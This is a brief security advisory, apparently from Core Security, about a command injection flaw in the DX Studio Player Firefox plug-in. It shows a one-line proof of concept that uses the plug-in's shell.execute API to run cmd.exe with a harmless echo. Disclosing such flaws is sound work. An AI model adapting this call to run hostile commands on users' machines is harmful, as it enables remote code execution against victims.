DX Studio Player Firefox plug-in command injection -- Complete with built-in Shell command

Nothing like having the API do the work for you:

shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")

[Core Security Advisory]